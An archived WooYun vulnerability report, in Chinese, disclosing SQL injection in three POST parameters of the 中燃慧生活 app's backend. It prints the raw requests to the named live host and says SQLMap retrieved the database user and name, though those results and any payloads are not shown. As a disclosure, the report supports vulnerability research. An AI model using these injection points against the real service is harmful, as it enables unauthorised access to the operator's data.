乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-02-16: 细节已通知厂商并且等待厂商处理中 2016-02-22: 厂商已经主动忽略漏洞,细节向公众公开
APP安全之SQL注入
目标:中燃慧生活APP检测发现以下几个地方均存在SQL注入:1、POST中的name,布尔盲注/时间盲注
POST http://zrds.zrhsh.cn/ZRapp/getLocationArea HTTP/1.1appverify: md5=7dc0db6536961498031d430d92134755;ts=1455599646992Charset: UTF-8User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;X9180 Build/FRF91 )Accept: */*x-mas-app-info: aaahg10001/publicConnection: Keep-AliveAccept-Encoding: gzip, deflateContent-Length: 32Content-Type: application/x-www-form-urlencodedHost: zrds.zrhsh.cnname=上海市
2、POST中的productId,布尔盲注/时间盲注
POST http://zrds.zrhsh.cn/ZRapp/getSTProductDetail HTTP/1.1Cookie: test=57838640appverify: md5=2252283658cc3b9fdc38c79ace09e82c;ts=1455602656607Charset: UTF-8User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;X9180 Build/FRF91 )Accept: */*x-mas-app-info: aaahg10001/publicConnection: Keep-AliveAccept-Encoding: gzip, deflateContent-Length: 33Content-Type: application/x-www-form-urlencodedHost: zrds.zrhsh.cnrootCategoryId=270&productId=8161
3、POST中的attr,布尔盲注/时间盲注
Cookie: test=57838640appverify: md5=561eb720f521916478f5f7b3c138c776;ts=1455599647480Charset: UTF-8User-Agent: Mozilla/5.0 (Linux; U; Mobile; Android 4.4.2;X9180 Build/FRF91 )Accept: */*x-mas-app-info: aaahg10001/publicConnection: Keep-AliveAccept-Encoding: gzip, deflateContent-Length: 5Content-Type: application/x-www-form-urlencodedHost: zrds.zrhsh.cnattr=
1、SQLMap漏洞证明
2、跑出当前数据库用户
3、跑出当前数据库名
请多指教~
危害等级:无影响厂商忽略
忽略时间:2016-02-22 09:00
漏洞Rank:4 (WooYun评价)
暂无